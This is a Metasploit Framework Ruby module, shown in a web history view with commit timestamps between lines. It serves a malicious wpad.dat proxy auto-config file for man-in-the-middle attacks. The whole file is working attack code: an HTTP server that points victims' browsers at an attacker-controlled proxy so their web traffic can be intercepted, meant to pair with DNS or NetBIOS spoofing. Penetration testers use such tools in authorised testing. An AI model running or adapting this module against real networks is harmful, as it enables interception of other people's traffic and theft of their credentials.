metasploit-framework/modules/auxiliary/server/wpad.rb

81 lines
2.3 KiB
Ruby
Raw Normal View History

2012-07-01 01:57:59 +00:00
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'WPAD.dat File Server',
'Version' => '$Revision$',
'Description' => %q{
2012-07-01 03:08:10 +00:00
This module generates a valid wpad.dat file for WPAD mitm
attacks. Usually this module is used in combination with DNS attacks
2012-07-01 02:21:56 +00:00
or the 'NetBIOS Name Service Spoofer' module. Please remember as the
2012-07-01 03:08:10 +00:00
server will be running by default on TCP port 80 you will need the
required privileges to open that port.
2012-07-01 01:57:59 +00:00
},
'Author' =>
[
'et' # Metasploit module
],
'Version' => '$Revision$',
'License' => MSF_LICENSE,
2012-07-01 03:08:10 +00:00
'DefaultOptions' =>
{
'SRVPORT' => 80
2012-07-01 01:57:59 +00:00
},
2012-07-02 15:57:32 +00:00
'Passive' => true))
2012-07-01 01:57:59 +00:00
register_options(
[
OptString.new('URIPATH',[ true, "WPAD/PAC Data file name (wpad.dat, proxy.pac)", '/wpad.dat' ]),
OptAddress.new('EXCLUDENETWORK', [ true, "Network to exclude",'127.0.0.1' ]),
OptAddress.new('EXCLUDENETMASK', [ true, "Netmask to exclude",'255.255.255.0' ]),
OptAddress.new('PROXY', [ true, "Proxy to redirect traffic to", '0.0.0.0' ]),
OptPort.new('PROXYPORT',[ true, "Proxy port", 8080 ])
], self.class)
end
2012-07-01 03:08:10 +00:00
2012-07-01 01:57:59 +00:00
def on_request_uri(cli, request)
print_status("Request '#{request.method} #{request.headers['user-agent']} from #{cli.peerhost}:#{cli.peerport}")
return if request.method == "POST"
html = <<-EOS
function FindProxyForURL(url, host) {
2012-07-01 03:08:10 +00:00
// URLs within this network are accessed directly
2012-07-01 01:57:59 +00:00
if (isInNet(host, "#{datastore['EXCLUDENETWORK']}", "#{datastore['EXCLUDENETMASK']}"))
{
return "DIRECT";
}
return "PROXY #{datastore['PROXY']}:#{datastore['PROXYPORT']}; DIRECT";
}
EOS
print_status("Sending WPAD config ...")
send_response_html(cli, html,
{
'Content-Type' => 'application/x-ns-proxy-autoconfig'
})
end
def run
print_status("WPAD Server started on port #{datastore['SRVPORT']}.")
exploit
end
end